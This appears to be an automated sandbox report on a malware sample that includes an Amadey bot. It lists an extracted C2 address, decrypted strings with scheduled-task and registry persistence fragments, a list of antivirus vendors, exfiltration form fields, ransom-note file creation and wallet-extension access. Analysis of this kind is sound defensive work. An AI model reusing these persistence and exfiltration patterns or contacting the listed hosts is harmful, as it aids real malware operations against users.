"C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windo
                Source: 22.2.NewPlayer.exe.60000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "45.9.74.80/0bjdn2Z/index.php", "Version": "3.67"}
                Source: 01860199.exeReversingLabs: Detection: 37%
                Source: 01860199.exeVirustotal: Detection: 38%Perma Link
                Source: colisumy.comVirustotal: Detection: 23%Perma Link
                Source: potunulit.orgVirustotal: Detection: 22%Perma Link
                Source: jp.imgjeoighw.comVirustotal: Detection: 19%Perma Link
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeReversingLabs: Detection: 86%
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exeReversingLabs: Detection: 86%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllReversingLabs: Detection: 83%
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\57DC.exeReversingLabs: Detection: 43%
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\6FA9.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Temp\913F.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\9F31.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\A170.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\A3D5.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\B8C8.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\D689.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Temp\XandETC.exeReversingLabs: Detection: 72%
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeReversingLabs: Detection: 33%
                Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dllReversingLabs: Detection: 83%
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Roaming\hwgujdvReversingLabs: Detection: 37%
                Source: 01860199.exeJoe Sandbox ML: detected
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: 45.9.74.80
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: /0bjdn2Z/index.php
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: 3.67
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: 6d73a97b0c
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: mnolyk.exe
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: SCHTASKS
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: /Create /SC MINUTE /MO 1 /TN
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: /TR "
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: " /F
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Startup
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: cmd /C RMDIR /s/q
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: rundll32
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: /Delete /TN "
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Programs
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: %USERPROFILE%
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: \App
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: POST
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &vs=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &sd=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &os=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &bi=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &ar=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &pc=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &un=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &dm=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &av=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &lv=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &og=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: cred.dll|clip.dll|
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Main
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: http://
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: https://
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Plugins/
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &unit=
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: shell32.dll
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: kernel32.dll
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: GetNativeSystemInfo
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: ProgramData\
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: AVAST Software
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Avira
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Kaspersky Lab
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: ESET
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Panda Security
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Doctor Web
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: 360TotalSecurity
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Bitdefender
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Norton
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Sophos
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Comodo
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: WinDefender
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: 0123456789
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: ------
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: ?scr=1
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: .jpg
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: ComputerName
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: -unicode-
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: VideoID
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: \0000
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: DefaultSettings.XResolution
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: DefaultSettings.YResolution
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: ProductName
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: 2019
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: 2022
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: 2016
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: CurrentBuild
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: echo Y|CACLS "
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: " /P "
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: CACLS "
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: :R" /E
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: :F" /E
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &&Exit
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: rundll32.exe
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: "taskkill /f /im "
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: " && timeout 1 && del
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: && Exit"
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: " && ren
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: &&
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: Powershell.exe
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: -executionpolicy remotesigned -File "
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: .D\
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor:
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: N}
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: pa
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: yz
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: l
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: I5
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: {(s
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: 3M
                Source: 22.2.NewPlayer.exe.60000.0.unpackString decryptor: !m
                Source: C:\Users\user\AppData\Local\Temp\D804.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\57DC.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\9F31.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\A3D5.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\BC2.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\D689.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\EA44.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\388B.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\CBE6.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\C861.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\673.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\A170.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\3E02.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\6FA9.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\B8C8.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\913F.exeJoe Sandbox ML: detected
                Source: D804.exe, 00000013.00000002.636070288.0000000003214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

                Compliance

                barindex
                Source: C:\Users\user\AppData\Local\Temp\D804.exeUnpacked PE file: 6.2.D804.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeUnpacked PE file: 16.2.D804.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\D804.exeUnpacked PE file: 19.2.D804.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeUnpacked PE file: 26.2.B46F.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\A170.exeUnpacked PE file: 29.2.A170.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeUnpacked PE file: 31.2.D804.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeUnpacked PE file: 32.2.build2.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\913F.exeUnpacked PE file: 37.2.913F.exe.400000.0.unpack
                Source: 01860199.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\_readme.txt
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\Users\user\_readme.txt
                Source: C:\Users\user\Desktop\01860199.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: unknownHTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49802 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49805 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49806 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49808 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49811 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49827 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49837 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49844 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49853 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49883 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49894 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49903 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49924 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 80.66.203.53:443 -> 192.168.2.3:49934 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49947 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49970 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49971 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49975 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50000 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:50021 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.234.35:443 -> 192.168.2.3:50022 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50024 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50031 version: TLS 1.2
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: D804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
                Source: Binary string: helppane.pdb source: 3C54.exe, 00000014.00000002.507574434.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644812591.00007FF777031000.00000020.00000001.01000000.0000000F.sdmp
                Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: NewPlayer.exe, 00000016.00000002.476201608.0000000000091000.00000002.00000001.01000000.00000011.sdmp, NewPlayer.exe, 00000016.00000000.461052075.0000000000091000.00000002.00000001.01000000.00000011.sdmp
                Source: Binary string: C:\sucagidupusehi\pahopigap\5\muhoyawa.pdb source: 01860199.exe, 00000000.00000000.351185873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, hwgujdv, 00000004.00000000.433612531.0000000000401000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: AC:\sucagidupusehi\pahopigap\5\muhoyawa.pdb source: 01860199.exe, 00000000.00000000.351185873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, hwgujdv, 00000004.00000000.433612531.0000000000401000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: TEST_mi_exe_stub.pdb source: D804.exe, 00000013.00000003.473635062.0000000009A20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\huvuvig\juhohan\bamakexuvoni\vaxilil\javefi\5\liguvihahoca\suci.pdb source: explorer.exe, 00000001.00000003.439363024.0000000005973000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.438814937.00000000157FF000.00000004.00000010.00020000.00000000.sdmp, D804.exe
                Source: Binary string: CGC:\huvuvig\juhohan\bamakexuvoni\vaxilil\javefi\5\liguvihahoca\suci.pdb source: explorer.exe, 00000001.00000003.439363024.0000000005973000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.438814937.00000000157FF000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: D804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: eex.pdb source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
                Source: Binary string: )5C:\rusuxenalo\dutaz jale\puyenotak\tipibu.pdb source: explorer.exe, 00000001.00000003.443261343.0000000005975000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.443214371.0000000008581000.00000004.00000001.00020000.00000000.sdmp, C861.exe, 00000007.00000000.443424351.0000000000401000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: C:\rusuxenalo\dutaz jale\puyenotak\tipibu.pdb source: explorer.exe, 00000001.00000003.443261343.0000000005975000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.443214371.0000000008581000.00000004.00000001.00020000.00000000.sdmp, C861.exe, 00000007.00000000.443424351.0000000000401000.00000020.00000001.01000000.00000009.sdmp
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_00403870 GetStringTypeExA,FindFirstVolumeMountPointW,GetPrivateProfileIntA,WaitForSingleObject,FreeConsole,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetVersionExW,GetConsoleAliasesLengthA,SleepEx,CreateFileMappingW,CreateMutexA,GetCommState,FreeConsole,MapGenericMask,DebugBreak,AttachConsole,MapGenericMask,DebugBreak,FreeConsole,AttachConsole,FreeConsole,InterlockedExchangeAdd,WaitForMultipleObjectsEx,GetCharWidthW,GetCharABCWidthsFloatW,GetCharWidthW,GetCharABCWidthsFloatW,GetLastError,GetLastError,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,GetLongPathNameA,WritePrivateProfileStructW,IsBadReadPtr,CancelWaitableTimer,GetFileType,GetModuleHandleA,
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

                Networking

                barindex
                Source: C:\Windows\explorer.exeDomain query: toobussy.com
                Source: C:\Windows\explorer.exeNetwork Connect: 123.140.161.243 80
                Source: C:\Windows\explorer.exeNetwork Connect: 80.66.203.53 443
                Source: C:\Windows\explorer.exeDomain query: colisumy.com
                Source: C:\Windows\explorer.exeDomain query: potunulit.org
                Source: C:\Windows\explorer.exeDomain query: speedlab.com.eg
                Source: C:\Windows\explorer.exeNetwork Connect: 45.9.74.80 80
                Source: C:\Windows\explorer.exeNetwork Connect: 217.174.148.28 443
                Source: C:\Windows\explorer.exeNetwork Connect: 175.119.10.231 80
                Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.7 80
                Source: C:\Windows\explorer.exeNetwork Connect: 211.40.39.251 80
                Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.7 80
                Source: C:\Windows\explorer.exeNetwork Connect: 211.119.84.112 80
